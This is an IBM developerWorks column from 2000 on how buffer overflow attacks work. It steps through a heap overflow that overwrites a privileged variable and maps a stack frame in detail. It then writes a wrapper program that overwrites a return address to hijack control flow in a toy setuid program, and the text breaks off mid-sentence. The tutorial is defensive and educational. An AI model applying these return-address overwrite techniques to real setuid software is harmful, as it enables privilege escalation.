developerWorks : Security : Library

[an error occurred while processing this directive]

Home

Products

Consulting

Industries

News

About IBM

Search

[an error occurred while processing this directive] [an error occurred while processing this directive]

	IBM : developerWorks : Security : Library - papers

Download it now!

PDF (75 KB)
Free Acrobat™ Reader

Make your software behave: Brass tacks and smash attacks
An analysis of how a buffer overflow attack works

Gary McGraw and John Viega
Reliable Software Technologies
March 14, 2000

Contents:

Heap overflow vulnerabilities

Stack overflow vulnerabilities

Launching toward infinity

Stacking the deck

What's next

Resources

About the authors

In their previous installment on buffer overflows, columnists Gary and John showed how to protect your code through defensive programming. In this column, Gary and John show you exactly how to construct a buffer overflow attack against a target program -- so you can proactively defend your own code against hacker exploits.

To understand the nature of most buffer overflows, you first need to understand the way memory is laid out in the machine when a typical program runs. On many systems, each process has its own virtual address space that somehow maps to real memory. We won't concern ourselves with describing the exact mechanisms used to map virtual address spaces to the underlying architecture. All we care about is that processes are theoretically allowed to address big chunks of continuous memory, and in some cases, parts of this memory can be abused by bad guys.

At a high level, several distinct regions of memory are almost always present:

The program arguments and the program environment.
The program stack, which usually grows as the program executes. Generally, it grows down, toward the heap.
The heap, which also tends to grow as the program executes. Usually, it grows up toward the stack.
The BSS segment, which contains uninitialized globally available data (such as global variables). In our Code Example 1 below, the variable number_matches will be allocated in the BSS segment because it is not initialized until main() is called.
The data segment, which contains initialized globally available data (usually global variables). In Code Example 1, the variable to_match will be allocated in the data segment, because it is initialized at declaration time.
The text segment, which contains the read only program code.

The BSS, data, and text segments constitute static memory: the sizes of these segments are fixed before the program ever runs. Data cannot be allocated in these segments as the program runs, although the individual variables can be changed. For example, the variable number_matches is incremented in our example code whenever the value of the variable to_match is found as an argument to the program. While we can change the value of to_match, the length of the string can never be greater than three characters, without risking overwriting other data.

Code Example 1
char to_match[] = "foo"; int number_matches; void main(int argc, char *argv[]) { int i; number_matches = 0; for(i = 0; i < argc; i++) { if(!strcmp(argv[i], to_match)) number_matches++; } printf("There were %d matches of %s.\n", number_matches, to_match); }

In contrast with static memory, the heap and the stack are dynamic: they can grow (and shrink) as the program executes. These size changes are a direct result of runtime memory allocation. There are two types of runtime memory allocation: stack allocation and heap allocation. The programmer interface to the heap varies by language. In C, the heap is accessed via malloc() and other related functions. In C++, the new operator is the programmer's interface to the heap.

Stack allocation is handled automatically for the programmer whenever a function gets called. The stack holds information about the context of the current function call. The container for this information is a continuous block of storage called an activation record or, alternatively, a stack frame. Many things can go into an activation record, whose contents are generally both architecture-dependent and compiler-dependent. Some common items placed in stack frames include values for non-static local variables of the function, actual parameters (that is, the arguments passed to a function), saved register information, and the address to which the program should jump when the function returns. Many of these items are kept in machine registers instead of on the stack, mainly for reasons of added efficiency (a compiler-dependent factor).

In C, data can be overflowed on both the stack and the heap. As we have learned, sometimes overflows overwrite interesting things and thereby cause security problems. For example, an overflow might overwrite a security-critical access control flag; or perhaps an overflow might reset a password. In the case of stack smashing, an overflow overwrites the return address in a stack frame. If an attacker can put his own code into a stack-assigned variable, and then construct a new return address to jump to that code, he can do whatever we wants! Usually he would want to get an interactive shell.

Let's dig into heap and stack overflows in more detail.

Assessing heap overflow vulnerabilities
Although heap overflows are simple in theory, exploiting a heap overflow is actually difficult for an attacker, for several reasons. First, the attacker has to figure out which variables are security critical. This process is often extremely difficult, especially when a prospective attacker doesn't have source code. Second, even when security-critical variables are identified, the attacker has to come up with a buffer that can be overflowed in such a way as to overwrite the target variable. This generally means the buffer needs to have a lower memory address than the target variable; otherwise, there's no way to overflow up into the variable address space.

Let's look at an example. Consider an x86 machine running Linux. We'll start with a silly little program -- really just a program fragment:

void main(int argc, char **argv)
{
  int i;
  char *str = (char *)malloc(sizeof(char)*4);
  char *super_user = (char *)malloc(sizeof(char)*9);
  strcpy(super_user, "viega");
  if(argc > 1)
    strcpy(str, argv[1]);
  else
    strcpy(str, "xyz");
}

Pretend that this program runs with root privileges. Note that we can see the source code, and also notice that super_user is an important variable elsewhere in the program. That means if we can overwrite it, we can potentially manipulate the program to do "bad things."

Can we overwrite the variable? To begin trying, we might guess that super_user is placed right after str in memory. Our initial mental model looks something like:

Memory address	Variable
Whatever	`str`
Whatever + 4	`super_user`

But who is to say super_user doesn't come before str? And who is to say they're placed together in memory? Our intuition is based on the order we see things textually in the program. Unfortunately for the budding bad guys, a compiler does not have to respect the order of its appearance in code. So, what's the answer?

Let's copy the program to our own directory and start playing around with it. We'll modify the program to print out the address of these two buffers:

void main(int argc, char **argv)
{
  int i;
  char *str = (char *)malloc(sizeof(char)*4);
  char *super_user = (char *)malloc(sizeof(char)*9);
  printf("Address of str is: %p\n", str);
  printf("Address of super_user is: %p\n", super_user);
  strcpy(super_user, "viega");
  if(argc > 1)
    strcpy(str, argv[1]);
  else
    strcpy(str, "xyz");
}

When we run this program on our machine, a typical result is:

Address of str is: 0x80496c0
Address of super_user is: 0x80496d0

In this case, super_user does follow str, so that's a good sign. They're not placed right next to each other, however, which comes as a bit of a surprise. Let's go ahead and print out all the memory at the end of the code snippet from the start of str to the end of super_user by making the following modification to our version of the code:

void main(int argc, char **argv)
{
  int i;
  char *str = (char *)malloc(sizeof(char)*4);
  char *super_user = (char *)malloc(sizeof(char)*9);
  char *tmp;
  printf("Address of str is: %p\n", str);
  printf("Address of super_user is: %p\n", super_user);
  strcpy(super_user, "viega");
  if(argc > 1)
    strcpy(str, argv[1]);
  else
    strcpy(str, "xyz");
  tmp = str;
  while(tmp < super_user + 9)
    {
      printf("%p: %c (0x%x)\n", tmp, *tmp, *(unsigned int*)tmp);
      tmp += 1;
    }
}

The %p argument in the printf format string causes tmp to be printed out as a pointer to memory in hexadecimal. The %c prints out one byte as a character. The %x prints out an integer in hexadecimal. Since the values of the elements in tmp are shorter than integers, we need to recast each one as an unsigned int, so that everything prints out properly.

If we run the program with no arguments, a typical result looks like this:

Address of str is: 0x8049700
Address of super_user is: 0x8049710
0x8049700: x (0x78)
0x8049701: y (0x79)
0x8049702: z (0x7a)
0x8049703:   (0x0)
0x8049704:   (0x0)
0x8049705:   (0x0)
0x8049706:   (0x0)
0x8049707:   (0x0)
0x8049708:   (0x0)
0x8049709:   (0x0)
0x804970a:   (0x0)
0x804970b:   (0x0)
0x804970c: _ (0x11)
0x804970d:   (0x0)
0x804970e:   (0x0)
0x804970f:   (0x0)
0x8049710: v (0x76)
0x8049711: i (0x69)
0x8049712: e (0x65)
0x8049713: g (0x67)
0x8049714: a (0x61)
0x8049715:   (0x0)
0x8049716:   (0x0)
0x8049717:   (0x0)
0x8049718:   (0x0)

Observe that four bytes are reserved for str (which occurs twelve bytes before the variable super_user begins). Let's try to overwrite the value of super_user with mcgraw. To do this, we pass an argument to the program on the command line, which gets copied into str.

Run the program like so:

./a.out xyz���..mcgraw

This gives the exact behavior we desire:

Address of str is: 0x8049700
Address of super_user is: 0x8049710
0x8049700: x (0x78)
0x8049701: y (0x79)
0x8049702: z (0x7a)
0x8049703: . (0x2e)
0x8049704: . (0x2e)
0x8049705: . (0x2e)
0x8049706: . (0x2e)
0x8049707: . (0x2e)
0x8049708: . (0x2e)
0x8049709: . (0x2e)
0x804970a: . (0x2e)
0x804970b: . (0x2e)
0x804970c: . (0x2e)
0x804970d: . (0x2e)
0x804970e: . (0x2e)
0x804970f: . (0x2e)
0x8049710: m (0x6d)
0x8049711: c (0x63)
0x8049712: g (0x67)
0x8049713: r (0x72)
0x8049714: a (0x61)
0x8049715: w (0x77)
0x8049716:   (0x0)
0x8049717:   (0x0)
0x8049718:   (0x0)

We can't put spaces or nulls in the string very easily through our simple command line interface. So in this case, we simply pad it with periods, which is sufficient. A better way to insert input with nulls and periods is to call a program with another program. The calling program can construct any string it wants, and pass arbitrary arguments to the program it invokes via execv (or some similar function). We'll do this sort of thing later when we consider stack overflows.

We have now successfully overflowed a heap variable. Notice that we had to write over some "in-between" space. In this case, our stomping around in memory didn't cause problems. In real programs, though, we might be forced to overwrite data that is crucial to the basic functioning of the program. If we do something wrong, the program might crash when it hits the "middle" data we overwrote before it uses the malicious data we placed on the heap. This would render our attack useless. (Curses, foiled again.) If our stomping around causes problems, we'll have to determine exactly what data we need to leave alone on the heap.

As a developer, you need to keep heap overflow in mind as a potential target area for an attack. You need to remember this with an attacker's mindset too! Don't forget that a security-critical variable might somehow get modified between the time you first overwrite it and the time the variable is used in its security-critical context.

Assessing stack overflow vulnerabilities
The main problem with heap overflows is that it is hard to find a security-critical region to overwrite in the manner desired. Stack overflows are not as much of a challenge, because there is always something security-critical to overwrite on the stack -- the return address!

Here is our devil's-advocate agenda for assessing and attacking a stack overflow:

Find a stack-allocated buffer to overflow that will allow us to overwrite the return address in a stack frame.
Place hostile code in memory that we can jump to when the function we're attacking returns.
Write over the return address on the stack with a value that will cause the program to jump to our hostile code.

To implement this sample attack, first we need to figure out which buffers in a program we can overflow. Generally, two types of stack-allocated data exist: non-static local variables and parameters to functions.

Can we overflow both types of data? It depends. We can only overflow items with a lower memory address than the return address. Our first order of business, then, is to select some function and "map" the stack. In other words, we want to find out where the parameters and local variables live relative to the return address we're interested in.

Let's start with another simple C program:

void test(int i)
{
  char buf[12];
}
int main()
{
  test(12);
}

The test function has one local parameter and one statically allocated buffer. In order to look at the memory addresses where these two variables live (relative to each other), we'll modify the code slightly:

void test(int i)
{
  char buf[12];
  printf("&i = %p\n", &i);
  printf("&buf[0] = %p\n", buf);
}
int main()
{
  test(12);
}

A typical execution for our modified code results in the following output:

&i = 0xbffffa9c
&buf[0] = 0xbffffa88

Now we can look in the general vicinity of these data, and determine if we see something that looks like a return address. Let's start looking eight bytes above buf, and stop looking eight bytes past the end of i.

In order to do this, we'll modify the code as follows:

/* Global variable, so we don't add anything to the stack */
char *j;
void test(int i)
{
  char buf[12];
  printf("&i = %p\n", &i);
  printf("&buf[0] = %p\n", buf);
  for(j=buf-8;j<((char *)&i)+8;j++)
    printf("%p: 0x%x\n", j, *(unsigned char *)j);
}
int main()
{
  test(12);
}

Note that to get eight bytes beyond the start of the variable i we have to cast the variable's address to a char *. Why? Because when C adds eight to an address, it really adds eight times the size of the data type it thinks is stored at the memory address. That means adding eight to an integer pointer will increase the memory address by 32 bytes instead of the desired eight bytes.

Here is a typical output from our new program:

&i = 0xbffffa9c
&buf[0] = 0xbffffa88
0xbffffa80: 0x45
0xbffffa81: 0xfa
0xbffffa82: 0xff
0xbffffa83: 0xbf
0xbffffa84: 0xbf
0xbffffa85: 0x0
0xbffffa86: 0x0
0xbffffa87: 0x0
0xbffffa88: 0xfc
0xbffffa89: 0x83
0xbffffa8a: 0x4
0xbffffa8b: 0x8
0xbffffa8c: 0x9c
0xbffffa8d: 0xfa
0xbffffa8e: 0xff
0xbffffa8f: 0xbf
0xbffffa90: 0x49
0xbffffa91: 0xd6
0xbffffa92: 0x2
0xbffffa93: 0x40
0xbffffa94: 0xa0
0xbffffa95: 0xfa
0xbffffa96: 0xff
0xbffffa97: 0xbf
0xbffffa98: 0xe6
0xbffffa99: 0x84
0xbffffa9a: 0x4
0xbffffa9b: 0x8
0xbffffa9c: 0xc
0xbffffa9d: 0x0
0xbffffa9e: 0x0
0xbffffa9f: 0x0
0xbffffaa0: 0x0
0xbffffaa1: 0x0
0xbffffaa2: 0x0
0xbffffaa3: 0x0

The forty two thousand dollar question is: Does anything here look like a return address? Remember, a memory address is four bytes, and we're only looking at things one byte at a time. That's fine. But we still don't know the range we should be looking in. How can we deduce the range where the return address will be? One thing we know is that the program will return to the main() function. Maybe we can get the address of the main function, print it out, and then look for a pattern of four consecutive bytes that are quite close.

Let's modify the code again:

char *j;
int main();
void test(int i)
{
  char buf[12];
  printf("&main = %p\n", &main);
  printf("&i = %p\n", &i);
  printf("&buf[0] = %p\n", buf);
  for(j=buf-8;j<((char *)&i)+8;j++)
    printf("%p: 0x%x\n", j, *(unsigned char *)j);
}
int main()
{
  test(12);
}

Running this program yields output that looks something like this:

&main = 0x80484ec
&i = 0xbffffa9c
&buf[0] = 0xbffffa88
0xbffffa80: 0x61
0xbffffa81: 0xfa
0xbffffa82: 0xff
0xbffffa83: 0xbf
0xbffffa84: 0xbf
0xbffffa85: 0x0
0xbffffa86: 0x0
0xbffffa87: 0x0
0xbffffa88: 0xfc
0xbffffa89: 0x83
0xbffffa8a: 0x4
0xbffffa8b: 0x8
0xbffffa8c: 0x9c
0xbffffa8d: 0xfa
0xbffffa8e: 0xff
0xbffffa8f: 0xbf
0xbffffa90: 0x49
0xbffffa91: 0xd6
0xbffffa92: 0x2
0xbffffa93: 0x40
0xbffffa94: 0xa0
0xbffffa95: 0xfa
0xbffffa96: 0xff
0xbffffa97: 0xbf
0xbffffa98: 0xf6
0xbffffa99: 0x84
0xbffffa9a: 0x4
0xbffffa9b: 0x8
0xbffffa9c: 0xc
0xbffffa9d: 0x0
0xbffffa9e: 0x0
0xbffffa9f: 0x0
0xbffffaa0: 0x0
0xbffffaa1: 0x0
0xbffffaa2: 0x0
0xbffffaa3: 0x0

Apparently, the function main lives at 0x80484ec. So in our output, we expect to see three consecutive bytes, where the first two are 0x8 and 0x4, and the third is 0x84, or maybe 0x85. (We expect this because we believe the code from the start of main to where the test returns is just a few bytes long. For the third byte to be greater than 0x85, it would have to be at least 17 bytes of code.) The fourth byte could be anything reasonable. Of course we can find all three of these bytes in the program somewhere, but not in the right order. If you look closely, you'll find they do appear -- in reverse order! This is no coincidence. The memory address we're looking for is stored in four bytes.

The x86 stores some multibyte primitive types in a weird way: The data we seek is stored last byte first and first byte last. In fact, as it turns out, all the bits are actually stored upside-down! Whenever we use data, they are treated the right way, however. That's why if we print out one byte at a time, the individual bytes print "right side up," but when we look at four bytes that should be consecutive, they're in reverse order.

As an example, consider the variable i. When we print it out, we will see 12. In 32-bit hexadecimal, 12 is represented as 0x0000000c. If we expected these bytes to be right side up, then starting at byte 0xbffffa9c, we'd expect to see:

0xbffffa9c: 0x0
0xbffffa9d: 0x0
0xbffffa9e: 0x0
0xbffffa9f: 0xc

But in this architecture, we'll see the bytes in the reverse order. So to recap, if we print out the variable as a single 32-bit quantity in hexadecimal, we get 0xc (12), and not 0xc000000 (201326592 unsigned), but if we dump the memory, that's not what we see.

Next, let's look for the main function's pattern of four bytes in reverse order. We'll start by picking out those sections where the two most significant bytes are 0x8 and 0x4 (because the most significant bytes are the last two in the set of four). We want to consider a couple of target sections. First, we have the following part of the stack:

0xbffffa88: 0xfc
0xbffffa89: 0x83
0xbffffa8a: 0x4
0xbffffa8b: 0x8

Reassembling these four bytes, we get 0x80483fc. That's pretty close to 0x80484ec, where main lives. It's doubtless the wrong thing, though, since it is slightly smaller than the address of main, and we're looking for something slightly larger. But it sure looks like a return address!

There is another reason why this isn't the return address we're looking for. Look at the memory address at which that word starts: 0xbffffa88. If you carefully examine the output, you'll notice that 0xbffffa88 is the starting address for buf. We did ask for 12 bytes to be allocated to buf, but we never asked the system to put anything in that buffer. However, since C doesn't zero out the buffer for us, the value of the buffer is the same as whatever used to live in the exact same memory location. It is highly likely that 0xbffffa88 was a previously stored return address from another program! In any case, it's not what we're looking for.

There is only one other candidate in the memory dump:

0xbffffa98: 0xf6
0xbffffa99: 0x84
0xbffffa9a: 0x4
0xbffffa9b: 0x8

This memory fits the bill perfectly. Reassembling these four bytes, we get 0x80484f6, which is 10 bytes past the start of main(). So now let's map out the stack, starting at the beginning of buf (0xbffffa88):

0xbffffa88-0xbffffa93 is the char array buf.

The next 4 bytes are:

0xbffffa94: 0xa0
0xbffffa95: 0xfa
0xbffffa96: 0xff
0xbffffa97: 0xbf

This value, when reassembled, is 0xbffffaa0, which is obviously a pointer further down in the stack. It turns out that this word is the value that the register ebp held before the call to test(). It will be put back into ebp as soon as execution returns from test into main. But why was ebp pointing into the stack? The value of ebp is called the base pointer. It points into the current stack frame. Code accessing local variables and parameters gets written in terms of the base pointer. It turns out that the base pointer points to the place where the old base pointer is stored. So the current value of ebp in this case would be 0xbffffa94.

The next four bytes, starting at 0xbffffa98, constitute the return address. The four bytes after that (0xbffffa9c - 0xbffffa9f) are where the parameter i is stored. The next byte, 0xbffffaa0, is where the old base pointer points (that is, the base pointer for main's call frame). The value of the word starting at that address should contain the base pointer for the function which called main. Of course, no function we know has called main, so learning that 0x000000 is the value of that word should come as no surprise.

After all this work, we now have a good idea of what a stack frame looks like:

Low address
	Local variables
	The old base pointer
	The return address
	Parameters to the function
High address

The stack grows toward memory address 0, and the previous stack frame is below the function parameters.

Now we know that if we overflow a local variable, we can overwrite the return address for the function we're in.

We also know that if we overflow a function parameter, we can overwrite the return address in the stack frame below us. (There always is one, it turns out. The main function returns to some code in the C runtime library.)

Let's test out our new-found knowledge using the following toy program:

/* Collect program arguments into a buffer, then print the buffer */
void concat_arguments(int argc, char **argv)
{
  char buf[20];
  char *p = buf;
  int i;
  for(i=1;i<argc;i++)
    {
      strcpy(p, argv[i]);
      p+=strlen(argv[i]);
      if(i+1 != argc)
        {
          *p++ = ' '; /* Add a space back in */
        }
    }
  printf("%s\n", buf);
}
int main(int argc, char **argv)
{
  concat_arguments(argc, argv);
}

Just for practice, let's pretend our little program is installed setuid root, meaning that if we can overflow a buffer and install some code to get a shell, we should end up with root privileges on the machine. The first thing we'll do is copy the program over to our own directory where we can experiment with it.

To begin, notice that we can overflow the buffer buf and overwrite the return address. All we have to do is pass more than 20 characters in on the command line. How many more? Based on our previous exploration of the stack, we might guess that there are 20 bytes for buf, then four bytes for p and then four more bytes for i. Next, there should be four more bytes storing the old base pointer, and finally, the return address. So we expect the return address to start 32 bytes past the beginning of buf. Let's make some modifications and see if our assumptions are correct.

We'll start by printing out the relative positions of buf, p, and i. With some minor modification to the code, you might get something like:

./a.out foo
foo
&p = 0xbffff8d8
&buf[0] = 0xbffff8dc
&i = 0xbffff8d4

It turns out that p and i are both placed at lower memory addresses than buf. That's because the first argument is allocated first on the stack. The stack grows toward smaller memory addresses. That means we should expect the return address to be 24 bytes past the start of buf. We can inspect the stack in detail as we did before to be certain. Amazingly, this assumption turns out to be correct.

Launching toward infinity
Now let's try to make the program jump somewhere it's not supposed to jump. For example, we can take a guess at where concat_arguments starts, and make it jump there. The idea is to put the program into an infinite loop where there should be no infinite loop, as a simple proof of concept. We'll add code to show us where concat_arguments starts. The danger is that we might modify the address at which concat_arguments starts by adding code. Generally, we won't have to worry about this problem if we add code to the function whose address we want, but nowhere else in the code (since the code will only grow down, toward higher memory addresses).

Let's get rid of the code that prints out the value of our variables, and print out the address of concat_arguments instead. We modify the code as follows:

void concat_arguments(int argc, char **argv)
{
  char buf[20];
  char *p = buf;
  int i;
  for(i=1;i<argc;i++)
    {
      strcpy(p, argv[i]);
      p+=strlen(argv[i]);
      if(i+1 != argc)
        {
          *p++ = ' '; /* Add a space back in */
        }
    }
  printf("%s\n", buf);
  printf("%p\n", &concat_arguments);
}
int main(int argc, char **argv)
{
  concat_arguments(argc, argv);
}

When we compile this program as such:

gcc -o concat concat.c

And then run it:

./concat foo bar

We get something similar to the following:

foo bar
0x80484d4

Now we need to call the program in such a way that we overwrite the return value with 0x80484d4.

Ugh! Somehow we have to put arbitrary bytes into our command-line input. That isn't fun, but we can do it. We'll write a little C program to call our code, which should make our life a bit easier. We need to put 24 bytes in our buffer, then the value 0x800484d4. What bytes shall we put in the buffer? For now, let's fill it with the letter x (0x78). We can't fill it with nulls (0x0), because the strcpy won't copy over our buffer if we do, as it stops the first time it sees a null. So here's a first cut at a wrapper program, which we place in a file called wrapconcat.c



int main()
{
  char* buf = (char *)malloc(sizeof(char)*1024);
  char **arr = (char **)malloc(sizeof(char *)*3);
  int i;
  for(i=0;i<24;i++) buf[i] = 'x';
  buf[24] = 0xd4;
  buf[25] = 0x84;
  buf[26] = 0x4;
  buf[27] = 0x8;
  arr[0] = "./concat";
  arr[1] = buf;
  arr[2] = 0x00;
  execv("./concat", arr);
}

Remember, we have to put the four bytes of our address into the buffer in Little Endian ordering, so the most significant byte goes in last.

Let's remove our old debugging statement from concat.c, and then compile both concat.c and wrapconcat.c. Now we can run wrapconcat. Unfortunately, we don't get the happy results we expected:

[viega@lima bo]$ ./wrapconcat
xxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
[viega@lima bo]$

What went wrong? Let's try to find out. Remember, we can add code to the concat_arguments function without changing the address for that function. So let's add some debugging information to concat.c:

void concat_arguments(int argc, char **argv)
{
  char buf[20];
  char *p = buf;
  int i;
  printf("Entering concat_arguments.\n"
          "This should happen twice if our program jumps to the right place\n");
  for(i=1;i<argc;i++)
    {
      printf("i = %d; argc = %d\n");
      strcpy(p, argv[i]);
      p+=strlen(argv[i]);
      if(i+1 != argc)
        {
          *p++ = ' '; /* Add a space back in */
        }
    }
  printf("%s\n", buf);
}
int main(int argc, char **argv)
{
  concat_arguments(argc, argv);
}

Running this code through our wrapper will result in something like the following output:

[viega@lima bo]$ ./wrapconcat
Entering concat_arguments.
This should happen twice if our program jumps to the right place
i = 1; argc = 2
i = 2; argc = 32
Segmentation fault (core dumped)
[viega@lima bo]$

Why did argc jump from 2 to 32, causing the program to go through the loop twice? Apparently argc was overwritten by the previous strcpy. Let's check our mental model of the stack:



Lower addresses


  
i
(4 bytes)


  
p
(4 bytes)


  
buf
(20 bytes)


  
old base pointer
(4 bytes)


  
return address
(4 bytes)


  
argc
(4 bytes)


  
argv
(4 bytes)


Higher addresses



Actually, we haven't looked to see if argc comes before argv. It turns out that it will. You can determine this by inspecting the stack before the strcpy. If you do so, you'll see that the value of the four bytes after the return address will always be equal to argc.

So why are we writing over argv? Let's add some code to give us a "before and after" picture of the stack. We'll look at it before we do the first strcpy, and then take another look after we do the last strcpy. Time to modify the program again:

void concat_arguments(int argc, char **argv)
{
  char buf[20];
  char *p = buf;
  int i;
  printf("Entering concat_arguments.\n"
          "This should happen twice if our program jumps to the right place\n");
  printf("Before picture of the stack:\n");
  for(i=0;i<40;i++)
    {
      printf("%p: %x\n", buf + i, *(unsigned char *)(buf+i));
    }
  for(i=1;i<argc;i++)
    {
      printf("i = %d; argc = %d\n", i, argc);
      strcpy(p, argv[i]);
      /*
       * We'll reuse i to avoid adding to the size of the stack frame.
       * We will set it back to 1 when we're done with it!
       * (we're not expecting to make it into loop iteration 2!)
       */
      printf("AFTER picture of the stack:\n");
      for(i=0;i<40;i++)
        {
          printf("%p: %x\n", buf + i, *(unsigned char *)(buf+i));
        }
      /* Set i back to 1. */
      i = 1;
      p+=strlen(argv[i]);
      if(i+1 != argc)
        {
          *p++ = ' '; /* Add a space back in */
        }
    }
  printf("%s\n", buf);
  printf("%p\n", &concat_arguments);
}
int main(int argc, char **argv)
{
  concat_arguments(argc, argv);
}

Running this program with our wrapper will result in something like the following:

[viega@lima bo]$ ./wrapconcat
Entering concat_arguments.
This should happen twice if our program jumps to the right place
Before picture of the stack:
0xbffff8fc: 98
0xbffff8fd: f9
0xbffff8fe: 9
0xbffff8ff: 40
0xbffff900: 84
0xbffff901: f9
0xbffff902: 9
0xbffff903: 40
0xbffff904: bc
0xbffff905: 1f
0xbffff906: 2
0xbffff907: 40
0xbffff908: 98
0xbffff909: f9
0xbffff90a: 9
0xbffff90b: 40
0xbffff90c: 60
0xbffff90d: 86
0xbffff90e: 4
0xbffff90f: 8
0xbffff910: 20
0xbffff911: f9
0xbffff912: ff
0xbffff913: bf
0xbffff914: 34
0xbffff915: 86
0xbffff916: 4
0xbffff917: 8
0xbffff918: 2
0xbffff919: 0
0xbffff91a: 0
0xbffff91b: 0
0xbffff91c: 40
0xbffff91d: f9
0xbffff91e: ff
0xbffff91f: bf
0xbffff920: 34
0xbffff921: f9
0xbffff922: ff
0xbffff923: bf
i = 1; argc = 2
0xbffff8fc: 78
0xbffff8fd: 78
0xbffff8fe: 78
0xbffff8ff: 78
0xbffff900: 78
0xbffff901: 78
0xbffff902: 78
0xbffff903: 78
0xbffff904: 78
0xbffff905: 78
0xbffff906: 78
0xbffff907: 78
0xbffff908: 78
0xbffff909: 78
0xbffff90a: 78
0xbffff90b: 78
0xbffff90c: 78
0xbffff90d: 78
0xbffff90e: 78
0xbffff90f: 78
0xbffff910: 78
0xbffff911: 78
0xbffff912: 78
0xbffff913: 78
0xbffff914: d4
0xbffff915: 84
0xbffff916: 4
0xbffff917: 8
0xbffff918: 0
0xbffff919: 0
0xbffff91a: 0
0xbffff91b: 0
0xbffff91c: 40
0xbffff91d: f9
0xbffff91e: ff
0xbffff91f: bf
0xbffff920: 34
0xbffff921: f9
0xbffff922: ff
0xbffff923: bf
i = 2; argc = 32
Segmentation fault (core dumped)
[viega@lima bo]$

Let's pay special attention to argc. In the "before" version of the stack, it lives at 0xbffff918. Its value is 2, as would be expected. Now, this variable lives in the same place in the "after" version, but note that the value has changed to 0. Why did it change to 0? Because we forgot that strcpy copies up to -- and including -- the first null it finds in a buffer. So we accidentally wrote a 0 over argc. Oops!

But how did argc change from 0 to 32? Look at the code after we print out the stack. In it, argc is not equal to i+1, so we add a space at the end of the buffer; and the least significant byte of argc is currently the end of the buffer! So the null gets replaced with a space (ASCII 32).

It is now obvious that we can't leave that null where it is. How do we solve the problem? From our wrapper, we can add a 0x2 to the end of the buffer, so that we write the null into the second least significant digit, instead of the least significant digit. This change will cause a 0x2 to appear at 0xbffff918, and a 0x0 to appear at 0xbffff919, causing the memory address of argc to look exactly the same in the "before" and "after" versions of the stack.

Here's a fixed version of the wrapper code:

int main()
{
  char* buf = (char *)malloc(sizeof(char)*1024);
  char **arr = (char **)malloc(sizeof(char *)*3);
  int i;
  for(i=0;i<24;i++) buf[i] = 'x';
  buf[24] = 0xd4;
  buf[25] = 0x84;
  buf[26] = 0x4;
  buf[27] = 0x8;
  buf[28] = 0x2;
  buf[29] = 0x00;
  arr[0] = "./concat";
  arr[1] = buf;
  arr[2] = '\0';
  execv("./concat", arr);
}

Let's document the code we inserted into concat.c before we run it again (leaving the rest of the debugging code intact). After we recompile both programs, and run our wrapper, we have the following:

[viega@lima bo]$ ./wrapconcat
Entering concat_arguments.
This should happen twice if our program jumps to the right place
i = 1; argc = 2
xxxxxxxxxxxxxxxxxxxxxxxx
0x80484d4
Entering concat_arguments.
This should happen twice if our program jumps to the right place
xxxxxxxxxxxxxxxxxxxxxxxx
0x80484d4
Segmentation fault (core dumped)
[viega@lima bo]$

This result is far more promising! Our code jumped back to the beginning of the function.


Stacking the deck in your favor

But why didn't the program loop forever, like it was supposed to? The answer to this question requires an in-depth understanding of what goes on when a function is called using C on an x86 running Linux. Two interesting pointers into the stack exist: the base pointer and the stack pointer. The base pointer we already know about. It points into the middle of a stack frame. It is used to simplify referring to local variables and parameters from the assembly code generated by the compiler. For example, the variable i in the concat_arguments function isn't named at all, if you happen to look for it in the assembly code. Instead, it is expressed as a constant offset from the base pointer. The base pointer lives in the register ebp. The stack pointer always points to the top of the stack. As things get pushed onto the stack, the stack pointer automatically moves to account for it. As things get removed from the stack, the stack pointer is automatically adjusted.

Before a function call is made, the caller has some responsibilities. A C programmer doesn't have to worry about these responsibilities, as the compiler takes care of them; but you can see these steps explicitly if you go digging in the assembled version of a program. First, the caller pushes all of the parameters that are expected by the called function onto the stack. As this is done, the stack pointer changes automatically. Second, the caller can save some other things by pushing them onto the stack too. When done, the caller invokes the function with the x86 call instruction. The call instruction then pushes the return address onto the stack (which will generally be the instruction textually following the call), and the stack pointer gets updated accordingly. Finally, the call instruction causes execution to shift to the callee -- that is, the program counter is set to be the address of the function being called.

The callee has some responsibilities too. First, the caller's base pointer is saved by pushing the contents of the ebp register onto the stack. This updates the stack pointer, which is now pointing at the old base pointer. (The callee is responsible for saving some other registers to the stack as well, but they don't concern us.) Next, the caller sets the value of the ebp for its own use. The current value of the stack pointer is used as the caller's base pointer. So the contents of register esp are copied into register ebp. Then, the callee moves the stack pointer enough to reserve space for all locally allocated variables.

When the callee is ready to return, the caller updates the stack pointer to point to the return address. The ret instruction transfers control of the program to the return address on the stack, and moves the stack pointer to reflect it. The caller restores any state it wants to get back (such as the base pointer), and then goes its merry way.

Now let's rejoin our exercise and figure out what happens when our little program runs.

We finish carrying out the exit responsibilities of the callee, then jump back to the top of the function, where we start to carry out the entrance responsibilities of the callee. The problem is that we completely ignore the responsibilities of the caller. The caller's responsibilities on return don't matter, since we're only going to transfer control back to concat_arguments. But the stuff that main is supposed to do before a call never happens when we jump to the top of concat_arguments.

Ah ha! The most important thing that doesn't happen, when we jumped to the start of a function as we did, is pushing a return address onto the stack. As a result, the stack pointer ends up four bytes higher than where it should be, which messes up local variable access. The crucial thing that really caused the crash, however, is the lack of a return address on the stack. When execution gets to the end of concat_arguments the second time, it tries to shift to the return address on the stack -- but we never gave it one. So when we pop, we get whatever happens to be there, which turns out to be the saved base pointer. Of course, we have just overwritten the saved base pointer with 0x78787878. Our poor program jumps to 0x78787878 and promptly crashes. Oops!

Of course, we don't really need to put our program in an infinite loop anyway. We've already demonstrated that we can jump to an arbitrary point in memory, and then run code. We could switch gears and begin to focus on placing some exploit code on the stack and jumping to that. Instead, let's go ahead and get our program to go into an infinite loop, just to make sure we have mastered the material. We'll craft an actual exploit in the next installment of this column.

Here's how we can get our program to go into an infinite loop. Instead of changing the return address to be the top of the concat_arguments function, let's change it to be some instruction that calls concat_arguments, so that a valid return address will get pushed onto the stack. If we get a valid return address back onto the stack, the base pointer will be correct, meaning that our input will once again overwrite the return address at the right place, resulting in an infinite loop.

Let's start with our most recent version of concat (the one with debugging information but without the code to print the contents of the stack). Instead of printing the address of concat_arguments, we want to print the address of the call instruction in function main. How do we get that address? Unfortunately, we can't get this information from C. We have to get it from assembly language. Let's compile concat.c as is to assembly language, as follows:

gcc -S concat.c

Now look at the contents of concat.s. Assembly language might be Greek to you. That's fine; you don't need to be able to understand most of it. There are only a few things you should note:
	
